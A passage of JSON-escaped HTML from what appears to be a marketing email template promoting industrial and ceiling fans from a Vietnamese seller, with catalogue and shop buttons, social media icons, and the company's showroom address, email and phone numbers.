href=\\\"https:\\/\\/sunon.quatcaocap.com\\\" style=\\\"height:37px; v-text-anchor:middle; width:349px;\\\" arcsize=\\\"2.5%\\\"  strokecolor=\\\"#CCC\\\" strokeweight=\\\"1px\\\" fillcolor=\\\"#ffffff\\\"><w:anchorlock\\/><center style=\\\"color:#3598db;font-family: inherit; \\\"><![endif]-->\\r\\n    <a href=\\\"https:\\/\\/sunon.quatcaocap.com\\\" target=\\\"_blank\\\" class=\\\"v-button v-font-size\\\" style=\\\"box-sizing: border-box;display: inline-block;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #3598db; background-color: #ffffff; border-radius: 1px;-webkit-border-radius: 1px; -moz-border-radius: 1px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;border-top-color: #CCC; border-top-style: solid; border-top-width: 1px; border-left-color: #CCC; border-left-style: solid; border-left-width: 1px; border-right-color: #CCC; border-right-style: solid; border-right-width: 1px; border-bottom-color: #CCC; border-bottom-style: solid; border-bottom-width: 1px;font-family: inherit; font-size: 14px;\\\">\\r\\n      <span class=\\\"v-line-height\\\" style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><strong><span style=\\\"line-height: 16.8px;\\\">XEM TH\\u00caM E-CATALOGUE - SUNON (TAIWAN)<\\/span><\\/strong><\\/span>\\r\\n    <\\/a>\\r\\n    <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n    <!--[if gte mso 9]>\\r\\n      <table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 630px;\\\">\\r\\n        <tr>\\r\\n          <td background=\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1612264788124-cc.png\\\" valign=\\\"top\\\" width=\\\"100%\\\">\\r\\n      <v:rect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" fill=\\\"true\\\" stroke=\\\"false\\\" style=\\\"width: 630px;\\\">\\r\\n        <v:fill type=\\\"frame\\\" src=\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1612264788124-cc.png\\\" \\/><v:textbox style=\\\"mso-fit-shape-to-text:true\\\" inset=\\\"0,0,0,0\\\">\\r\\n      <![endif]-->\\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-image: url(\'https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1612264788124-cc.png\');background-repeat: no-repeat;background-position: center top;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 630px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ffffff;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-image: url(\'https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1612264788124-cc.png\');background-repeat: no-repeat;background-position: center top;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:630px;\\\"><tr style=\\\"background-color: #ffffff;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"630\\\" style=\\\"width: 630px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 630px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:25px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 0px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677296572547-quet_BR_code_2023.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 610px;\\\" width=\\\"610\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:15px 10px 10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-color v-line-height v-font-size\\\" style=\\\"font-size: 14px; color: #a47e6b; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\">Thi\\u1ebft k\\u1ebf t\\u01b0 v\\u1ea5n gi\\u1ea3i ph\\u00e1p qu\\u1ea1t l\\u00e0m m\\u00e1t<br \\/>D\\u00e0nh cho nh\\u00e0 x\\u01b0\\u1edfng, c\\u00f4ng nghi\\u1ec7p, v\\u0103n ph\\u00f2ng th\\u01b0\\u01a1ng m\\u1ea1i, nh\\u00e0 \\u1edf cao c\\u1ea5p.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:5px 10px 50px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><table border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\"><tr><td align=\\\"center\\\" bgcolor=\\\"#ffffff\\\" style=\\\"padding:10px 20px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-cong-nghiep\\\" target=\\\"_blank\\\" class=\\\"v-button v-font-size\\\" style=\\\"box-sizing: border-box;display: inline-block;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #a87f6b; background-color: #ffffff; border-radius: 1px;-webkit-border-radius: 1px; -moz-border-radius: 1px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;border-top-color: #CCC; border-top-style: solid; border-top-width: 1px; border-left-color: #CCC; border-left-style: solid; border-left-width: 1px; border-right-color: #CCC; border-right-style: solid; border-right-width: 1px; border-bottom-color: #CCC; border-bottom-style: solid; border-bottom-width: 1px;font-size: 14px;\\\">\\r\\n      <span class=\\\"v-line-height\\\" style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><strong><span style=\\\"line-height: 16.8px;\\\">S H O P\\u00a0 \\u00a0N O W<\\/span><\\/strong><\\/span>\\r\\n    <\\/a>\\r\\n    <!--[if mso]><\\/td><\\/tr><\\/table><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n    <!--[if gte mso 9]>\\r\\n      <\\/v:textbox><\\/v:rect>\\r\\n    <\\/td>\\r\\n    <\\/tr>\\r\\n    <\\/table>\\r\\n    <![endif]-->\\r\\n    \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 630px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ffffff;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:630px;\\\"><tr style=\\\"background-color: #ffffff;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"630\\\" style=\\\"width: 630px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 630px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:30px 10px 0px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-color v-line-height v-font-size\\\" style=\\\"font-size: 14px; color: #a5726e; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 14px; line-height: 19.6px;\\\"><strong><span style=\\\"line-height: 19.6px; font-size: 14px;\\\">F O L L O W\\u00a0 \\u00a0A L O N G\\u00a0 \\u00a0W I T H\\u00a0 \\u00a0U S<\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"28%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 2px solid #ca979a;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div align=\\\"center\\\">\\r\\n  <div style=\\\"display: table; max-width:183px;\\\">\\r\\n  <!--[if (mso)|(IE)]><table width=\\\"183\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"border-collapse:collapse;\\\" align=\\\"center\\\"><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"border-collapse:collapse; mso-table-lspace: 0pt;mso-table-rspace: 0pt; width:183px;\\\"><tr><![endif]-->\\r\\n  \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 14px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 14px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/pinterest.com\\/\\\" title=\\\"Pinterest\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/rounded\\/pinterest.png\\\" alt=\\\"Pinterest\\\" title=\\\"Pinterest\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 14px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 14px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/youtube.com\\/\\\" title=\\\"YouTube\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/rounded\\/youtube.png\\\" alt=\\\"YouTube\\\" title=\\\"YouTube\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 14px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 14px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/instagram.com\\/\\\" title=\\\"Instagram\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/rounded\\/instagram.png\\\" alt=\\\"Instagram\\\" title=\\\"Instagram\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 0px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/soundcloud.com\\/\\\" title=\\\"SoundCloud\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/rounded\\/soundcloud.png\\\" alt=\\\"SoundCloud\\\" title=\\\"SoundCloud\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h3 class=\\\"v-color v-line-height v-font-size\\\" style=\\\"margin: 0px; line-height: 140%; text-align: center; word-wrap: break-word; font-family: arial black,AvenirNext-Heavy,avant garde,arial; font-size: 18px; font-weight: 700;\\\">The World\\u2019s Most Efficient Ceiling Fan<\\/h3>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_10\\\" style=\\\"font-family:arial,helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 20px;font-family:arial,helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-color v-line-height v-font-size\\\" style=\\\"font-size: 14px; line-height: 150%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 150%;\\\">-------o0o------<\\/p>\\r\\n<p style=\\\"line-height: 150%;\\\">\\u2198\\ufe0f Office &amp; Showroom: 304 Tr\\u01b0\\u01a1ng V\\u0103n Bang, Th\\u1ea1nh M\\u1ef9 L\\u1ee3i, Tp Th\\u1ee7 \\u0110\\u1ee9c, Tp H\\u1ed3 Ch\\u00ed Minh.<\\/p>\\r\\n<p style=\\\"line-height: 150%;\\\">\\ud83d\\udc8c Email: sale@hogiaphat.vn<\\/p>\\r\\n<p style=\\\"line-height: 150%;\\\">\\u260e\\ufe0f T\\u01b0 v\\u1ea5n B\\u00e1n H\\u00e0ng: 0913 123860<\\/p>\\r\\n<p style=\\\"line-height: 150%;\\\">\\ud83d\\udcde Hotline: 028 730 333 69<\\/p>\\r\\n<p style=\\\"line-height: 150%;\\\">\\u00a0<\\/p>\\r\\n<p style=\\\"line-height: 150%;\\\">\\u00a0\\u25b9\\u25b9\\u25b9Tổ chức đào tạo WIT\\/H\\u1ed3 Gia Ph\\u00e1t \\u25b9\\u25b9\\u25b9<\\/p>\\r\\n<p style=\\\"line-height: 150%;\\\">\\u2705 Mang \\u0111\\u1ebfn gi\\u1ea3i ph\\u00e1p qu\\u1ea1t l\\u00e0m m\\u00e1t ti\\u1ec7n nghi &amp; tr\\u1ea3i nghi\\u1ec7m t\\u1ed1t h\\u01a1n cho gia \\u0111\\u00ecnh nh\\u00e0 \\u1edf ho\\u1eb7c doanh nghi\\u1ec7p c\\u1ee7a b\\u1ea1n<\\/p>\\r\\n<p style=\\\"line-height: 150%;\\\">\\u2622\\ufe0f D\\u00e0nh cho nh\\u00e0 x\\u01b0\\u1edfng, c\\u00f4ng nghi\\u1ec7p, v\\u0103n ph\\u00f2ng th\\u01b0\\u01a1ng m\\u1ea1i, nh\\u00e0 \\u1edf cao c\\u1ea5p.<\\/p>\\r\\n<p style=\\\"line-height: 150%;\\\">\\u267b\\ufe0f\\u00a0 S\\u1ef1 quan t\\u00e2m c\\u1ee7a ch\\u00fang t\\u00f4i l\\u00e0 s\\u1eed d\\u1ee5ng n\\u0103ng l\\u01b0\\u1ee3ng hi\\u1ec7u qu\\u1ea3.\\u00a0<\\/p>\\r\\n<p style=\\\"line-height: 150%;\\\">\\ud83c\\udf10\\u00a0<a href=\\\"https:\\/\\/www.bigfans.vn\\/\\\">https:\\/\\/www.bigfans.vn<\\/a><\\/p>\\r\\n<p style=\\\"line-height: 150%;\\\">\\ud83c\\udf10\\u00a0<a href=\\\"https:\\/\\/quattran.co\\/\\\">https:\\/\\/quattran.co<\\/a><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 630px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #a47e6b;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:630px;\\\"><tr style=\\\"background-color: #a47e6b;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"630\\\" style=\\\"width: 630px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 630px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid 